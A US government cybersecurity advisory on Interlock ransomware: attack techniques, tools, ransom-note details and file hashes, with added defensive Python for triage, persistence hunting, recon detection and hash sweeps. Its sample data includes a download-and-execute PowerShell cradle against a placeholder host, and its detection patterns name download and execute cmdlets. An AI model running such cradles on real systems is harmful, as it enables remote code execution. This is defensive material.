#StopRansomware: Interlock

Source: US Department of Homeland Security

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)—hereafter referred to as “the authoring organizations”—are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third-party reporting.

The Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.

Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked. 

FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for tables mapped to the threat actors’ activity.

Overview

Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services. 

Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.

The authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.1 For additional information on Rhysida ransomware, see the joint advisory, #StopRansomware: Rhysida Ransomware.

Initial Access

FBI has observed Interlock actors obtaining initial access [TA0001] via drive-by download [T1189] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).2

In some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [T1189]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [T1204.004].3

Note: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.4
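When a ClickFix lure succeeds, the first artifact a defender sees is a powershell.exe launch carrying a Base64 blob (PowerShell's -EncodedCommand takes UTF-16LE text, and accepts any unambiguous prefix of the switch name such as -e, -ec or -enc). The Python below is an added triage example, not code from the advisory or the authoring agencies: it decodes the encoded command from process-creation records and scores the event. The records, host names and the placeholder script it decodes are constructed for the example, and the two scoring heuristics (a parent of explorer.exe, which is what the Run dialog launches from, and download-and-execute cmdlets in the decoded text) are this example's assumptions, not observations from the advisory.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match the switch loosely and confirm the prefix in code.
ENC_FLAG_RE = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

# Cmdlets that commonly appear when a one-liner fetches and runs a second stage.
# Assumption for this example; the advisory does not publish the actual script.
CRADLE_RE = re.compile(
    r"Invoke-WebRequest|DownloadString|Invoke-Expression|\biex\b|\biwr\b", re.IGNORECASE
)


def decode_encoded_command(command_line):
    """Return the decoded script of a powershell -EncodedCommand launch, else None."""
    for match in ENC_FLAG_RE.finditer(command_line):
        flag, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ep (ExecutionPolicy): not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def triage_event(event):
    """Score one process-creation record; None when it is not an encoded PowerShell launch."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded = decode_encoded_command(event["command_line"])
    if decoded is None:
        return None
    reasons = ["encoded PowerShell command line"]
    # The Run dialog (Win+R) launches its child under explorer.exe, so an encoded
    # command with that parent is consistent with a user pasting a ClickFix lure.
    if event.get("parent_image", "").lower().endswith("explorer.exe"):
        reasons.append("launched from explorer.exe (interactive user, e.g. Win+R)")
    if CRADLE_RE.search(decoded):
        reasons.append("decoded script contains a download/execute cradle")
    return {"host": event["host"], "decoded": decoded, "reasons": reasons, "score": len(reasons)}


def triage(events):
    return [f for f in (triage_event(e) for e in events) if f]


# --- constructed sample input (not from the advisory) ---
PLACEHOLDER_SCRIPT = "Invoke-WebRequest http://example.invalid/update.ps1 | Invoke-Expression"
PLACEHOLDER_B64 = base64.b64encode(PLACEHOLDER_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"host": "WS-0142", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -nop -enc {PLACEHOLDER_B64}"},
    {"host": "WS-0142", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ep Bypass -File C:\\Scripts\\inventory.ps1"},
    {"host": "SRV-DB01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], finding["score"], "; ".join(finding["reasons"]))
        print("  decoded:", finding["decoded"])
```

The second sample record shows why the prefix check matters: `-ep Bypass` starts with `-e` but is ExecutionPolicy, and a naive `-e` match would try to decode the word `Bypass`.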

Execution and Persistence

Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [T1105] designed to execute a PowerShell script [T1059.001] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [T1547.001], establishing persistence [TA0003]. 

FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [T1547.001]. To do so, Interlock actors used a PowerShell command [T1059.001] designed to add a run key value named “Chrome Updater” [T1036.005] that uses a specific log file as an argument upon user login.
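Both persistence mechanisms described above leave registry or file-system telemetry that an EDR or Sysmon pipeline already collects. The Python below is an added hunting example, not code from the advisory or the authoring agencies: it walks Sysmon-style records (Event ID 13 registry value set with TargetObject/Details, Event ID 11 file create with TargetFilename/Image) and flags a Run value named "Chrome Updater", a Run value whose command line passes a .log file as an argument, and files written into a Startup folder, with PowerShell as the writer as the strongest signal. The records, SIDs, user names and paths are constructed for the example.

```python
import re

# Matches the value name at the end of an HKCU/HKLM ...\CurrentVersion\Run(Once) path.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# Run key value name the advisory attributes to Interlock.
INTERLOCK_RUN_VALUE_NAMES = {"chrome updater"}


def check_run_key(event):
    """Flag a registry value-set event that writes a Run key the way the advisory describes."""
    match = RUN_KEY_RE.search(event["target_object"])
    if not match:
        return None
    value_name = match.group("value")
    reasons = []
    if value_name.lower() in INTERLOCK_RUN_VALUE_NAMES:
        reasons.append(f"Run value name {value_name!r} matches Interlock persistence")
    # The advisory says the value passes a log file as an argument on logon.
    if re.search(r"\S+\.log\b", event.get("details", ""), re.IGNORECASE):
        reasons.append("Run value command line passes a .log file as an argument")
    if not reasons:
        return None
    return {"host": event["host"], "technique": "T1547.001",
            "object": event["target_object"], "reasons": reasons}


def check_startup_drop(event):
    """Flag a file created in a Startup folder; strongest when PowerShell wrote it."""
    path = event["target_filename"]
    if not STARTUP_DIR_RE.search(path):
        return None
    reasons = ["file created in a Startup folder"]
    if event.get("image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        reasons.append("written by PowerShell, as in the advisory's RAT drop")
    return {"host": event["host"], "technique": "T1547.001", "object": path, "reasons": reasons}


def hunt(events):
    findings = []
    for ev in events:
        if ev["event_id"] == 13:
            finding = check_run_key(ev)
        elif ev["event_id"] == 11:
            finding = check_startup_drop(ev)
        else:
            finding = None
        if finding:
            findings.append(finding)
    return findings


# --- constructed Sysmon-style records (field names follow Sysmon, values are invented) ---
SAMPLE_EVENTS = [
    {"event_id": 13, "host": "WS-0142",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Updater",
     "details": r"C:\Users\alice\AppData\Roaming\ChromeUpdater.exe C:\Users\alice\AppData\Roaming\update.log"},
    {"event_id": 13, "host": "WS-0142",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"event_id": 11, "host": "WS-0177",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_filename": r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"event_id": 1, "host": "WS-0177", "image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["host"], finding["technique"], finding["object"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The legitimate OneDrive Run value in the sample produces no finding, which is the point of requiring at least one of the advisory's specifics (the value name or the .log argument) rather than alerting on every Run key write.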

Reconnaissance

To facilitate reconnaissance, a PowerShell script executes a series of commands [T1059.001] designed to gather information on victim machines (see Table 1).

Table 1. PowerShell Commands for Reconnaissance
PowerShell Command | Description
WindowsIdentity.GetCurrent() | Returns a WindowsIdentity object that represents the current Windows user [T1033].
systeminfo | Displays detailed configuration information [T1082] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.
tasklist /svc | Lists unabridged service information [T1007] for each process currently running on the local computer.
Get-Service | Gets objects that represent the services [T1007] on a computer, including running and stopped services.
Get-PSDrive | Gets the drives [T1082] in the current session, such as Windows logical drives on the computer (including drives mapped to network shares), drives exposed by PowerShell providers, and session-specified temporary drives and persistent mapped network drives.
arp -a | Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [T1016], which contains entries on the IPv4 and IPv6 addresses on host endpoints.
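Each command in Table 1 is ordinary administrator activity on its own; what distinguishes the reconnaissance script is several of them running on one host in quick succession. The Python below is an added detection example, not code from the advisory or the authoring agencies: it classifies process command lines against the Table 1 commands and raises one finding per host where at least three distinct commands appear inside a ten-minute window. The window, the threshold and the event records (hosts, users, timestamps) are this example's own constructed choices.

```python
import re
from datetime import datetime, timedelta

# Commands from Table 1, with a regex for how each appears in a process command line
# or a PowerShell ScriptBlock log (WindowsIdentity is usually called as
# [System.Security.Principal.WindowsIdentity]::GetCurrent()).
RECON_SIGNATURES = {
    "WindowsIdentity.GetCurrent()": re.compile(r"WindowsIdentity\]?(?:::|\.)GetCurrent\(\)", re.I),
    "systeminfo": re.compile(r"\bsysteminfo(?:\.exe)?\b", re.I),
    "tasklist /svc": re.compile(r"\btasklist(?:\.exe)?\s+/svc\b", re.I),
    "Get-Service": re.compile(r"\bGet-Service\b", re.I),
    "Get-PSDrive": re.compile(r"\bGet-PSDrive\b", re.I),
    "arp -a": re.compile(r"\barp(?:\.exe)?\s+-a\b", re.I),
}
WINDOW = timedelta(minutes=10)   # assumption for this example
THRESHOLD = 3                     # distinct Table 1 commands per host within WINDOW


def classify(command_line):
    """Names of the Table 1 commands present in one command line."""
    return {name for name, rx in RECON_SIGNATURES.items() if rx.search(command_line)}


def detect_recon_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Return one finding per host whose command history shows a recon burst."""
    by_host = {}
    for ev in events:
        names = classify(ev["command_line"])
        if names:
            by_host.setdefault(ev["host"], []).append(
                (datetime.fromisoformat(ev["time"]), names, ev["user"]))
    findings = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (start, _, user) in enumerate(hits):
            seen = set()
            for when, names, _ in hits[i:]:
                if when - start > window:
                    break
                seen |= names
            if len(seen) >= threshold:
                findings.append({"host": host, "user": user,
                                 "first_seen": start.isoformat(), "commands": sorted(seen)})
                break  # one finding per host is enough for an analyst queue
    return findings


# --- constructed process-creation records (not from the advisory) ---
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "alice", "time": "2025-06-01T10:00:05", "command_line": "systeminfo"},
    {"host": "WS-0142", "user": "alice", "time": "2025-06-01T10:00:20", "command_line": "tasklist /svc"},
    {"host": "WS-0142", "user": "alice", "time": "2025-06-01T10:00:41",
     "command_line": "powershell.exe -c Get-PSDrive"},
    {"host": "WS-0142", "user": "alice", "time": "2025-06-01T10:01:10", "command_line": "arp -a"},
    {"host": "WS-0142", "user": "alice", "time": "2025-06-01T10:01:30", "command_line": "cmd.exe /c whoami"},
    # An admin running two of the commands hours apart should not trip the detector.
    {"host": "SRV-FS01", "user": "svc_backup", "time": "2025-06-01T09:00:00", "command_line": "systeminfo"},
    {"host": "SRV-FS01", "user": "svc_backup", "time": "2025-06-01T14:00:00", "command_line": "arp -a"},
]

if __name__ == "__main__":
    for finding in detect_recon_bursts(SAMPLE_EVENTS):
        print(finding["host"], finding["user"], finding["first_seen"], ", ".join(finding["commands"]))
```

Tune the window and threshold to the environment: inventory scripts legitimately run systeminfo and Get-Service, so a baseline of which hosts and service accounts do so on a schedule keeps the finding queue short.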

Command and Control

FBI observed Interlock actors using command and control (C2) [TA0011] applications like Cobalt Strike and SystemBC. Interlock actors also used Interlock RAT5 and NodeSnake RAT (as of March 2025)6 for C2 and executing commands.

Credential Access, Lateral Movement, and Privilege Escalation

FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (cht.exe) [TA0006] and keylogger binary (klg.dll) [T1056.001],[T1105]. According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts [T1555.003], while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named conhost.txt [T1036.005].7 As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [TA0006], including Lumma Stealer8 and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [T1078].9

Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)10 [T1021.001] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [T1219].11 In addition to stealing users’ online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [T1558.003])12 to gain additional privileges [T1078.002]. 

Collection and Exfiltration

Interlock actors leverage Azure Storage Explorer (StorageExplorer.exe) to navigate victims’ Microsoft Azure Storage accounts [T1530] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [T1567.002].13 Interlock actors also exfiltrate data over file transfer tools, including WinSCP [T1048].

Impact

Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named conhost.exe [T1486],[T1036.005]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [T1486], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.14

A cybersecurity company identified a DLL binary named tmp41.wasd—executed after encryption using rundll32.exe [T1218.011]—which uses the remove() function to delete the encryption binary [T1070.004];15 on Linux machines, the encryptor uses a similar technique to execute the removeme function. 

Encrypted files are appended with either a .interlock or .1nt3rlock file extension, alongside a ransom note titled !__README__!.txt delivered via group policy object (GPO). Interlock actors use a double-extortion model [T1657], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a .onion URL. 

Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.16
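Scoping an Interlock incident means finding out which datastores and directories hold files with the .interlock or .1nt3rlock extension and where the !__README__!.txt note landed, plus checking process telemetry for the rundll32.exe launch of tmp41.wasd that follows encryption. The Python below is an added incident-response example, not code from the advisory or the authoring agencies: it walks a mounted volume and summarizes encrypted-file counts per directory and ransom-note locations, and offers a one-line check for the post-encryption cleanup command line. The directory tree it builds and the sample command lines are constructed for the example.

```python
import os
import tempfile
from collections import Counter

ENCRYPTED_EXTENSIONS = (".interlock", ".1nt3rlock")   # from the advisory
RANSOM_NOTE_NAME = "!__README__!.txt"                  # from the advisory


def scope_encryption(root):
    """Walk a mounted volume or datastore and summarise the encryptor's footprint on it."""
    by_dir = Counter()
    notes = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(ENCRYPTED_EXTENSIONS):
                by_dir[dirpath] += 1
            elif name == RANSOM_NOTE_NAME:
                notes.append(os.path.join(dirpath, name))
    return {
        "encrypted_files": sum(by_dir.values()),
        "by_directory": dict(by_dir),
        "ransom_notes": notes,
    }


def is_post_encryption_cleanup(command_line):
    """True for a rundll32 launch of tmp41.wasd, the DLL the advisory ties to deleting the encryptor."""
    lowered = command_line.lower()
    return "rundll32" in lowered and "tmp41.wasd" in lowered


def demo():
    """Build a constructed directory tree (not real victim data) and scope it."""
    with tempfile.TemporaryDirectory() as root:
        vm_dir = os.path.join(root, "datastore1", "vm-app01")
        os.makedirs(vm_dir)
        for name in ("vm-app01.vmdk.interlock", "vm-app01.vmx.1nt3rlock", "vm-app01.nvram.interlock"):
            open(os.path.join(vm_dir, name), "wb").close()
        open(os.path.join(vm_dir, "vm-app01.log"), "wb").close()   # untouched file
        open(os.path.join(root, "datastore1", RANSOM_NOTE_NAME), "wb").close()
        return scope_encryption(root)


if __name__ == "__main__":
    result = demo()
    print("encrypted files:", result["encrypted_files"])
    for directory, count in result["by_directory"].items():
        print(f"  {count:5d}  {directory}")
    print("ransom notes:", result["ransom_notes"])
    print("cleanup command?", is_post_encryption_cleanup(r"rundll32.exe C:\Windows\Temp\tmp41.wasd"))
```

Because the advisory reports VMs as the encrypted targets, run the scan against the hypervisor datastores (and any backup repository) rather than only against workstation volumes; the per-directory counts then map directly onto which virtual machines need restoring.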

See Table 2 for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.

Disclaimer: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Table 2. Tools Used by Interlock Ransomware Actors
Tool Name | Description
AnyDesk | A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.
Cobalt Strike | A penetration testing tool used by security professionals to test the security of networks and systems.
PowerShell | A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
PSExec | A tool designed to run programs and execute commands on remote systems.
PuTTY.exe | An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).
ScreenConnect | Remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).
SystemBC | Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.
Windows Console Host | Windows Console Host (conhost.exe) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.
WinSCP | A free and open source SSH File Transfer Protocol (SFTP), FTP, WebDAV, Amazon S3, and Secure Copy Protocol (SCP) client.

See Table 3 and Table 4 for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.

Disclaimer: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking.

Table 3. Files Used by Interlock Ransomware Actors (SHA-256)
File Name Hash
1.ps1 fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd 
advanced_port_scanner.exe 4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5
Aisa.exe 18a507bf1c533aad8e6f2a2b023fbbcac02a477e8f05b095ee29b52b90d47421
AnyDesk.exe 1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069
autoservice.dll a4069aa29628e64ea63b4fb3e29d16dcc368c5add304358a47097eedafbbb565
Autostart.exe d535bdc9970a3c6f7ebf0b229c695082a73eaeaf35a63cd8a0e7e6e3ceb22795
cht FAFCD5404A992850FFCFFEE46221F9B2FF716006AECB637B80E5CD5AA112D79C
cht.exe C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07
cleanup.dll (SystemBC) 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127
conhost 44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1
conhost.dll a70af759e38219ca3a7f7645f3e103b13c9fb1db6d13b68f3d468b7987540ddf
conhost.dll 96babe53d6569ee3b4d8fc09c2a6557e49ebc2ed1b965abda0f7f51378557eb1
difxepi.dll (SystemBC) 1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127
iexplore.exe d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb
klg.dll A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E
!!!OPEN_ME!!!.txt 68A49D5A097E3850F3BB572BAF2B75A8E158DADB70BADDC205C2628A9B660E7A
processhacker-2.39-bin.zip 88f26f3721076f74996f8518469d98bf9be0eaee5b9eccc72867ebfc25ea4e83
PsExec.exe 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
putty.exe 7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069
puttyportable.exe 97931d2e2e449ac3691eb526f6f60e2f828de89074bdac07bd7dbdfd51af9fa0
PuTTYPortable.zip ff7ad2376ae01e4b3f1e1d7ae630f87b8262b5c11bc5d953e1ac34ffe81401b5
qrpce91.exe.asd 64a0ab00d90682b1807c5d7da1a4ae67cde4c5757fc7d995d8f126f0ec8ae983
ScreenConnect.ClientService.exe 2814b33ce81d2d2e528bb1ed4290d665569f112c9be54e65abca50c41314d462
SophosendpointAgent.exe f51b3d054995803d04a754ea3ff7d31823fab654393e8054b227092580be43db
SophosScaner.exe dfb5ba578b81f05593c047f2c822eeb03785aecffb1504dcb7f8357e898b5024
Starship.exe 94bf0aba5f9f32b9c35e8dfc70afd8a35621ed6ef084453dc1b10719ae72f8e2
start 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
start.exe 70bb799557da5ac4f18093decc60c96c13359e30f246683815a512d7f9824c8f
StorageExplorer.exe 73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66
Sysmon.sys 1d04e33009bcd017898b9e1387e40b5c04279c02ebc110f12e4a724ccdb9e4fb
upd_2327991.exe 7b9e12e3561285181634ab32015eb653ab5e5cfa157dd16cdd327104b258c332
webujgd.lnk 70EE22D394E107FBB807D86D187C216AD66B8537EDC67931559A8AEF18F6B5B3
WinSCP-6.3.5-Setup.exe 8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3
Proxy Tool e4d6fe517cdf3790dfa51c62457f5acd8cb961ab1f083de37b15fd2fddeb9b8f
Encryptor e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
Encryptor c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6
Encryptor 28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
Table 4. Files Used by Interlock Ransomware Actors (SHA-1)
File Name Hash
autorun.log 514946a8fc248de1ccf0dbeee2108a3b4d75b5f6
jar.jar b625cc9e4024d09084e80a4a42ab7ccaa6afb61d
pack.jar 3703374c9622f74edc9c8e3a47a5d53007f7721e
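Table 3 mixes SHA-256 hashes in upper and lower case, lists the same digest under two names (cleanup.dll and difxepi.dll) and under both "start" and "Encryptor", and includes legitimate tools, so a hash sweep needs case normalization and labels that let an analyst apply the disclaimer above. The Python below is an added example, not code from the advisory or the authoring agencies: it carries a subset of the Table 3 and Table 4 digests copied from the advisory, hashes every file under a directory with SHA-256 and SHA-1 in one pass, and reports matches with their table label. The demo tree and the file it contains are constructed; the function also accepts caller-supplied hash sets so a full IOC download can be used instead of the subset.

```python
import hashlib
import os
import tempfile

# Subset of the SHA-256 (Table 3) and SHA-1 (Table 4) hashes published in the
# advisory. Rows for legitimate tools (AnyDesk, PsExec, Sysmon.sys, WinSCP, ...)
# are left out of this subset; digests are normalised to lower case on load.
_SHA256_ROWS = [
    ("fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd", "1.ps1"),
    ("C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07", "cht.exe (credential stealer)"),
    ("A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E", "klg.dll (keylogger)"),
    ("44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1", "conhost"),
    ("1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127", "cleanup.dll / difxepi.dll (SystemBC)"),
    ("e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1", "Encryptor"),
    ("c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6", "Encryptor"),
    ("28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f", "start / Encryptor"),
]
_SHA1_ROWS = [
    ("514946a8fc248de1ccf0dbeee2108a3b4d75b5f6", "autorun.log"),
    ("b625cc9e4024d09084e80a4a42ab7ccaa6afb61d", "jar.jar"),
    ("3703374c9622f74edc9c8e3a47a5d53007f7721e", "pack.jar"),
]
INTERLOCK_SHA256 = {digest.lower(): label for digest, label in _SHA256_ROWS}
INTERLOCK_SHA1 = {digest.lower(): label for digest, label in _SHA1_ROWS}


def file_digests(path):
    """SHA-256 and SHA-1 of one file, computed in a single streamed read."""
    h256, h1 = hashlib.sha256(), hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h256.update(chunk)
            h1.update(chunk)
    return h256.hexdigest(), h1.hexdigest()


def scan_tree(root, sha256_iocs=INTERLOCK_SHA256, sha1_iocs=INTERLOCK_SHA1):
    """Return a list of {path, algo, digest, label} for files whose digest is in an IOC set."""
    matches = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                d256, d1 = file_digests(path)
            except OSError:
                continue  # unreadable or vanished file; keep scanning
            if d256 in sha256_iocs:
                matches.append({"path": path, "algo": "sha256", "digest": d256, "label": sha256_iocs[d256]})
            if d1 in sha1_iocs:
                matches.append({"path": path, "algo": "sha1", "digest": d1, "label": sha1_iocs[d1]})
    return matches


def demo():
    """Scan a throw-away tree holding one constructed file, first against the advisory
    subset (no hit expected) and then against IOC sets built from that file's own digests."""
    with tempfile.TemporaryDirectory() as root:
        sample = os.path.join(root, "tools", "sample.bin")
        os.makedirs(os.path.dirname(sample))
        with open(sample, "wb") as fh:
            fh.write(b"constructed sample content, not a real Interlock artifact\n")
        d256, d1 = file_digests(sample)
        against_advisory = scan_tree(root)
        against_constructed = scan_tree(root, {d256: "constructed-test-sha256"}, {d1: "constructed-test-sha1"})
    return against_advisory, against_constructed


if __name__ == "__main__":
    advisory_hits, constructed_hits = demo()
    print("hits against advisory subset:", advisory_hits)
    for hit in constructed_hits:
        print(hit["algo"], hit["label"], hit["path"])
```

A hit is a lead for the investigation the disclaimer asks for, not a verdict: confirm the file's origin and execution history before blocking or deleting, especially where the label is a dual-use tool.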

MITRE ATT&CK Tactics and Techniques

See Table 5 through Table 16 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 5. Initial Access
Technique Title | ID | Use
